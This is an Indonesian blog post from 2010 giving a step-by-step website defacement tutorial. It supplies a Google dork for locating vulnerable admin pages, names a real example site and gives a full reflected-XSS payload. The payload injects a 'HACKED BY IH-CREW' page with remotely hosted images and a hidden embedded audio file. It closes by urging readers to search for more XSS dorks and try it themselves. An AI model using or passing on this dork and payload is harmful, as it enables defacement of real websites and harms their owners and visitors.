Sabtu, 27 November 2010

Deface 2

1.Not Defaced - But - Just For Fun :P

http://tinyurl.com/26zan89
+
http://tinyurl.com/3a9z6s2

POC :

Dork : inurl:"admin/index.php?msg="

contoh :
http://www.namastelounge.com/admin/i...20Login%20here

1. Coba ganti Please Login Here dengan Wording ente
2. contoh : http://www.namastelounge.com/admin/i...hp?msg=test123
sip- sudah berubah
3. XSS detected
4. Isenk2 masukin script nya :
dibelakang "/index.php?msg="
</style><title>:: HACKED BY IH-CREW ::</title><link rel="shortcut icon" href="http://ihcrew.net/bh.png" /><div align="center"><br><br><img src="http://ihcrew.net/ihcrew.png" title="Indonesian Hacker Crew" alt="logo" /><br><br><img src="http://img5.imageshack.us/img5/3834/gr33nc0d31024x768.jpg" title="Indonesian Hacker Crew" alt="logo" /><br>INDONESIAN HACKER BLACKHAT CREW<br><br>DEFACER : gr33nc0d3<br><br>Please don't mind I like Hack You<br><br>[ Bobyhikaru ] | [ kaMtiEz ] | [ r3m1ck ] | [ otong ] | [ ibL13Z ] | [ pl4nkt0n ]<br><br>[ Angga ] | [ bumble_be ] | [ system_rto ] | [ LyNx ] | [ shadowsmaker ]<br><br>[ Virgi ] | [ Fribo ] | [ Sudden_Death ] | [ Aa ] | [ Kimmonosz ]<br><br></table></div></div><embed src="http://codex.bobyputra.com/music/muse-starlight-remix.swf" width="0" height="0"></embed>
5. eng ing eng - ente sudah dapat apa yang ente inginkan.

untuk XSS dork sudah bertebaran di google - tinggal search aja kerwordnya "XSS Bug" atau "Dork XSS "

Selamat mencoba.
*************************************************************************

Tidak ada komentar:

Posting Komentar

Free Download 4shared Premium Gratis

http://bengkelweb.co.de/4shared/

Valid CSS!

LinuxHQ LinuxHQ
Free Automatic Backlink Religion (Islam) - TOP.ORG Religion blogs powered by PRBbutton Religion Blogs - Blog Rankings rantop.com Saung Link SEO-Supreme Professional search tools for free Get Freebl Religion Blogs